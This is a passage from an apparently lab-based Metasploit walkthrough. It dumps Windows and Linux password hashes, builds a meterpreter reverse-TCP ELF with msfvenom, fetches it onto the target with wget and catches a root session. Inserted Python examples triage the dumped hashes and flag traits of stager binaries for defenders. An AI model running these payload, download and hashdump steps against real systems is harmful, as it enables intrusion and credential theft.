   5   auxiliary/scanner/postgres/postgres_hashdump                           normal  No     Postgres Password Hashdump
   6   auxiliary/scanner/smb/impacket/secretsdump                             normal  No     DCOM Exec
   7   post/aix/hashdump                                                      normal  No     AIX Gather Dump Password Hashes
   8   post/android/gather/hashdump                                           normal  No     Android Gather Dump Password Hashes for Android Systems
   9   post/bsd/gather/hashdump                                               normal  No     BSD Dump Password Hashes
   10  post/linux/gather/hashdump                                             normal  No     Linux Gather Dump Password Hashes for Linux Systems
   11  post/osx/gather/hashdump                                               normal  No     OS X Gather Mac OS X Password Hash Collector
   12  post/solaris/gather/hashdump                                           normal  No     Solaris Gather Dump Password Hashes for Solaris Systems
   13  post/windows/gather/credentials/domain_hashdump                        normal  No     Windows Domain Controller Hashdump
   14  post/windows/gather/credentials/mcafee_vse_hashdump                    normal  No     McAfee Virus Scan Enterprise Password Hashes Dump
   15  post/windows/gather/credentials/mssql_local_hashdump                   normal  No     Windows Gather Local SQL Server Hash Dump
   16  post/windows/gather/hashdump                                           normal  No     Windows Gather Local User Account Password Hashes (Registry)
   17  post/windows/gather/smart_hashdump                                     normal  No     Windows Gather Local and Domain Controller Account Password Hashes


Interact with a module by name or index, for example use 17 or use post/windows/gather/smart_hashdump

msf5 > use 16
msf5 post(windows/gather/hashdump) > show options

Module options (post/windows/gather/hashdump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

msf5 post(windows/gather/hashdump) > set SESSION 2
SESSION => 2
msf5 post(windows/gather/hashdump) > show options

Module options (post/windows/gather/hashdump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  2                yes       The session to run this module on.

msf5 post(windows/gather/hashdump) > run

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 55bd17830e678f18a3110daf2c17d4c7...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pirate:1001:aad3b435b51404eeaad3b435b51404ee:8ce9a3ebd1647fcc5e04025019f4b875:::


[*] Post module execution completed

Answer : 8ce9a3ebd1647fcc5e04025019f4b875
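
As an added example (not part of this write-up or of Metasploit's hashdump module), the Python below triages pwdump-style lines like the ones printed above. Each record is `user:RID:LM:NT:::`; `aad3b435b51404eeaad3b435b51404ee` is the LM hash of an empty password, which hashdump prints for every account when LM storage is disabled, and `31d6cfe0d16ae931b73c59d7e0c089c0` is the NT hash of an empty password. The parser flags empty passwords, accounts that still store a real LM hash, NT hashes shared between accounts (password reuse) and the built-in Administrator RID. The sample input is the module output above, embedded as a constant; `parse_pwdump` and `triage` are names chosen here.

```python
from collections import defaultdict

# NT hash of an empty password (MD4 of the empty UTF-16LE string).
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
# LM hash of an empty password; printed for every account when LM storage is off.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

# Constructed sample: the three lines printed by post/windows/gather/hashdump above.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pirate:1001:aad3b435b51404eeaad3b435b51404ee:8ce9a3ebd1647fcc5e04025019f4b875:::
"""


def parse_pwdump(text):
    """Parse user:RID:LM:NT::: lines; anything that does not fit the shape is skipped."""
    records = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if not rid.isdigit() or len(lm) != 32 or len(nt) != 32:
            continue
        records.append({"user": user, "rid": int(rid), "lm": lm, "nt": nt})
    return records


def triage(records):
    """Map user -> list of findings a defender would follow up on."""
    users_by_nt = defaultdict(list)
    for r in records:
        users_by_nt[r["nt"]].append(r["user"])
    findings = {}
    for r in records:
        issues = []
        if r["nt"] == EMPTY_NT:
            issues.append("empty-password")
        if r["lm"] != EMPTY_LM:
            issues.append("lm-hash-stored")  # LM hashes are trivially recoverable
        if r["nt"] != EMPTY_NT and len(users_by_nt[r["nt"]]) > 1:
            others = [u for u in users_by_nt[r["nt"]] if u != r["user"]]
            issues.append("nt-hash-shared-with:" + ",".join(others))
        if r["rid"] == 500:
            issues.append("builtin-administrator")
        findings[r["user"]] = issues
    return findings


if __name__ == "__main__":
    for user, issues in triage(parse_pwdump(SAMPLE)).items():
        print(user, issues or "ok")
```

An empty NT hash only says the stored password is empty; hashdump does not report whether the account is enabled, so that has to be checked separately before treating the Administrator and Guest hits as findings. In the output above, `pirate` is the only account with a non-empty NT hash, which is why it is the answer to the question.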

TASK 6 : Msfvenom

Launch the VM attached to this task. The username is murphy, and the password is 1q2w3e4r. You can connect via SSH or launch this machine in the browser. Once on the terminal, type “sudo su” to get a root shell, this will make things easier.

No Answer

Create a meterpreter payload in the .elf format.

root@ip-10-10-196-135:~/Desktop/msexploit# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.196.135 LPORT=7777 --platform linux -f elf -o shell.elf
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: shell.elf

The first payload I created didn't work, so I used a venom-builder https://pentest.ws/tools/venom-builder to get the exact syntax to use, like above, and the msfconsole launch command.
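
As an added example, not from the write-up and not msfvenom's own code, the Python below parses the ELF32 header and program headers of a small binary and reports the traits a raw msfvenom ELF has. The 207 bytes reported above are a 52-byte ELF header, one 32-byte program header and the 123-byte payload: no section headers, and a single readable, writable and executable PT_LOAD segment. The sample file is constructed inline with zero bytes where the payload would be, so it runs offline; `build_sample`, `parse_elf32` and `stager_indicators` are names chosen here, and the indicators are a triage signal (hand-built tiny binaries match them too), not a verdict.

```python
import struct

ELF_MAGIC = b"\x7fELF"
PT_LOAD = 1
PF_X, PF_W, PF_R = 1, 2, 4
MACHINES = {3: "EM_386", 40: "EM_ARM", 62: "EM_X86_64", 183: "EM_AARCH64"}

EHDR_FMT = "<16sHHIIIIIHHHHHH"   # ELF32 header, little-endian, 52 bytes
PHDR_FMT = "<IIIIIIII"           # ELF32 program header, 32 bytes


def build_sample(payload_len=123):
    """Constructed stand-in for the msfvenom ELF layout: header, one RWX PT_LOAD
    program header, then placeholder bytes where the payload would sit."""
    ehsize = struct.calcsize(EHDR_FMT)
    phsize = struct.calcsize(PHDR_FMT)
    total = ehsize + phsize + payload_len
    base = 0x08048000
    # e_ident: magic, class=1 (32-bit), data=1 (little-endian), version=1, pad
    ident = ELF_MAGIC + bytes([1, 1, 1, 0, 0]) + b"\x00" * 7
    ehdr = struct.pack(EHDR_FMT, ident, 2, 3, 1, base + ehsize + phsize,
                       ehsize, 0, 0, ehsize, phsize, 1, 0, 0, 0)
    phdr = struct.pack(PHDR_FMT, PT_LOAD, 0, base, base, total, total,
                       PF_R | PF_W | PF_X, 0x1000)
    return ehdr + phdr + b"\x00" * payload_len


def parse_elf32(data):
    """Parse the ELF32 header and program headers; ValueError if not ELF32 LE."""
    if data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    if data[4] != 1 or data[5] != 1:
        raise ValueError("only 32-bit little-endian ELF is handled here")
    (_, e_type, e_machine, _, e_entry, e_phoff, e_shoff, _,
     _, e_phentsize, e_phnum, _, e_shnum, _) = struct.unpack_from(EHDR_FMT, data, 0)
    segments = []
    for i in range(e_phnum):
        p_type, p_off, p_vaddr, _, p_filesz, p_memsz, p_flags, _ = \
            struct.unpack_from(PHDR_FMT, data, e_phoff + i * e_phentsize)
        flags = "".join(c for bit, c in ((PF_R, "R"), (PF_W, "W"), (PF_X, "X"))
                        if p_flags & bit)
        segments.append({"type": p_type, "offset": p_off, "vaddr": p_vaddr,
                         "filesz": p_filesz, "memsz": p_memsz, "flags": flags})
    return {"type": e_type, "machine": MACHINES.get(e_machine, str(e_machine)),
            "entry": e_entry, "shoff": e_shoff, "shnum": e_shnum,
            "segments": segments}


def stager_indicators(info, size):
    """Traits shared by raw msfvenom ELF payloads; each also occurs in benign
    minimal binaries, so treat the list as a reason to look closer."""
    hits = []
    loads = [s for s in info["segments"] if s["type"] == PT_LOAD]
    if info["shnum"] == 0 and info["shoff"] == 0:
        hits.append("no section headers")
    if len(loads) == 1 and "W" in loads[0]["flags"] and "X" in loads[0]["flags"]:
        hits.append("single writable+executable PT_LOAD")
    if size < 1024:
        hits.append("tiny file (%d bytes)" % size)
    return hits


if __name__ == "__main__":
    sample = build_sample()
    info = parse_elf32(sample)
    print(len(sample), "bytes,", info["machine"], "segments:", info["segments"])
    print(stager_indicators(info, len(sample)))
```

Running it on a real file is a matter of replacing `build_sample()` with `open(path, "rb").read()`; the same three checks are what a simple YARA or file-triage rule would encode.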

No Answer

Transfer it to the target machine (you can start a Python web server on your attacking machine with the python3 -m http.server 9000 command and use wget http://ATTACKING_MACHINE_IP:9000/shell.elf to download it to the target machine).

On the Kali machine:

root@ip-10-10-196-135:~/Desktop/msexploit# nano pyserver.py

import http.server
import socketserver

# Port the target fetches the payload from; the task text and the wget below use 9000.
PORT = 9000
Handler = http.server.SimpleHTTPRequestHandler

# Serve the current directory over plain HTTP until interrupted with Ctrl-C.
with socketserver.TCPServer(("", PORT), Handler) as httpd:
    print("serving at port", PORT)
    httpd.serve_forever()

root@ip-10-10-196-135:~/Desktop/msexploit# python3 pyserver.py 
serving at port 9000
10.10.55.92 - - [26/Sep/2021 10:37:52] "GET /rev_shell2.elf HTTP/1.1" 200 -

In the target SSH session:

root@ip-10-10-55-92:/tmp# wget http://10.10.196.135:9000/shell.elf
--2021-09-26 09:53:50--  http://10.10.196.135:9000/shell.elf
Connecting to 10.10.196.135:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: ‘shell.elf’

shell.elf                     100%[==============================================>]     207  --.-KB/s    in 0s      

2021-09-26 09:53:50 (12.6 MB/s) - ‘shell.elf’ saved [207/207]

No Answer

Get a meterpreter session on the target machine.

On the Kali machine:

root@ip-10-10-196-135:~/Desktop/msexploit# msfconsole -x "use exploit/multi/handler; set PAYLOAD linux/x86/meterpreter/reverse_tcp; set LHOST 10.10.196.135; set LPORT 7777; run"

On the target machine:

root@ip-10-10-55-92:/tmp# chmod +x rev_shell2.elf
root@ip-10-10-55-92:/tmp# ./rev_shell2.elf

On Kali we get a meterpreter session:

[...]
       =[ metasploit v5.0.101-dev                         ]
+ -- --=[ 2048 exploits - 1105 auxiliary - 344 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: You can use help to view all available commands

[*] Using configured payload generic/shell_reverse_tcp
PAYLOAD => linux/x86/meterpreter/reverse_tcp
LHOST => 10.10.196.135
LPORT => 7777
[*] Started reverse TCP handler on 10.10.196.135:7777 
[*] Sending stage (980808 bytes) to 10.10.55.92
[*] Meterpreter session 1 opened (10.10.196.135:7777 -> 10.10.55.92:54228) at 2021-09-26 10:56:30 +0100

meterpreter >

No Answer

Use a post exploitation module to dump hashes of other users on the system.

We can use the linux/gather/hashdump module, which Metasploit's search command finds:

meterpreter > 
Background session 1? [y/N]  y
[-] Unknown command: y.
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                                                       Connection
  --  ----  ----                   -----------                                                                       ----------
  1         meterpreter x86/linux  no-user @ ip-10-10-55-92 (uid=0, gid=0, euid=0, egid=0) @ ip-10-10-55-92.eu-w...  10.10.196.135:7777 -> 10.10.55.92:54228 (10.10.55.92)

msf5 exploit(multi/handler) > use linux/gather/hashdump
msf5 post(linux/gather/hashdump) > show options

Module options (post/linux/gather/hashdump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

msf5 post(linux/gather/hashdump) > set session 1
session => 1
msf5 post(linux/gather/hashdump) > run

[+] murphy:$6$qK0Kt4UO$HuCrlOJGbBJb5Av9SL7rEzbxcz/KZYFkMwUqAE0ZMDpNRmOHhPHeI2JU3m9OBOS7lUKkKMADLxCBcywzIxl7b.:1001:1001::/home/murphy:/bin/sh
[+] claire:$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0:1002:1002::/home/claire:/bin/sh
[+] Unshadowed Password File: /root/.msf4/loot/20210926110318_default_10.10.55.92_linux.hashes_221290.txt
[*] Post module execution completed

No Answer

What is the other user’s password hash ?

Answer :

$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0
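
As an added example (not part of this write-up or of Metasploit's hashdump module), here is a Python decoder for the unshadowed lines the module prints: `user:hash:uid:gid:gecos:home:shell`, where the hash field follows the crypt(3) convention `$id$[rounds=N$]salt$hash`. `$6$` is sha512crypt with 5000 rounds unless a rounds= field is present, so for murphy the salt is `qK0Kt4UO` and for claire it is `Sy0NNIXw`. The decoder also recognises locked (`*`/`!`) and empty password fields and flags weak algorithms. The sample input reuses the two lines above and adds constructed root, legacy and nopass entries; the md5crypt hash on the legacy line is a placeholder, not a real hash. `parse_crypt` and `audit_passwd` are names chosen here.

```python
# crypt(3) identifiers as used by glibc / libxcrypt.
CRYPT_IDS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
             "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}
WEAK_ALGOS = {"descrypt", "md5crypt"}
SHA_DEFAULT_ROUNDS = 5000   # glibc default for $5$/$6$ when no rounds= field is present

# Constructed sample: the two lines printed above plus three constructed entries
# (root locked, a legacy md5crypt user with a PLACEHOLDER hash, an empty field).
SAMPLE = """\
root:*:0:0:root:/root:/bin/bash
murphy:$6$qK0Kt4UO$HuCrlOJGbBJb5Av9SL7rEzbxcz/KZYFkMwUqAE0ZMDpNRmOHhPHeI2JU3m9OBOS7lUKkKMADLxCBcywzIxl7b.:1001:1001::/home/murphy:/bin/sh
claire:$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0:1002:1002::/home/claire:/bin/sh
legacy:$1$saltsalt$PLACEHOLDERxxxxxxxxxxxx:1003:1003::/home/legacy:/bin/sh
nopass::1004:1004::/home/nopass:/bin/sh
"""


def parse_crypt(field):
    """Describe one password field: algorithm, salt, rounds and account state."""
    if field == "":
        return {"algo": None, "salt": None, "rounds": None, "state": "no-password"}
    if field[0] in "*!":
        return {"algo": None, "salt": None, "rounds": None, "state": "locked"}
    if not field.startswith("$"):          # traditional 13-character DES crypt
        return {"algo": "descrypt", "salt": field[:2], "rounds": None, "state": "active"}
    parts = field.split("$")[1:]           # [id, (rounds=N | cost | params)?, salt, hash]
    algo = CRYPT_IDS.get(parts[0], "unknown:" + parts[0])
    rest = parts[1:]
    rounds = None
    if algo == "bcrypt":                   # $2b$<cost>$<22-char salt><31-char hash>
        rounds = 2 ** int(rest[0])
        salt = rest[1][:22]
    elif algo == "yescrypt":               # $y$<params>$<salt>$<hash>
        salt = rest[1]
    else:
        if rest and rest[0].startswith("rounds="):
            rounds = int(rest[0][len("rounds="):])
            rest = rest[1:]
        elif algo in ("sha256crypt", "sha512crypt"):
            rounds = SHA_DEFAULT_ROUNDS
        salt = rest[0] if rest else ""
    return {"algo": algo, "salt": salt, "rounds": rounds, "state": "active"}


def audit_passwd(text):
    """Map user -> (crypt info, list of issues) for each 7-field passwd line."""
    findings = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        user, pw = fields[0], fields[1]
        info = parse_crypt(pw)
        issues = []
        if info["state"] == "no-password":
            issues.append("empty password field")
        if info["algo"] in WEAK_ALGOS:
            issues.append("weak hash algorithm: " + info["algo"])
        if info["algo"] in ("sha256crypt", "sha512crypt") and info["rounds"] < SHA_DEFAULT_ROUNDS:
            issues.append("rounds below glibc default")
        findings[user] = (info, issues)
    return findings


if __name__ == "__main__":
    for user, (info, issues) in audit_passwd(SAMPLE).items():
        print(user, info["algo"], info["state"], issues or "ok")
```

The same parser runs unchanged over a real `/etc/shadow` (nine colon-separated fields) if the length check is relaxed to `len(fields) >= 2`; the hash field sits in the second column in both layouts.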

TASK 7 : Summary

No answer needed.

No Answer

This post is licensed under CC BY 4.0 by the author.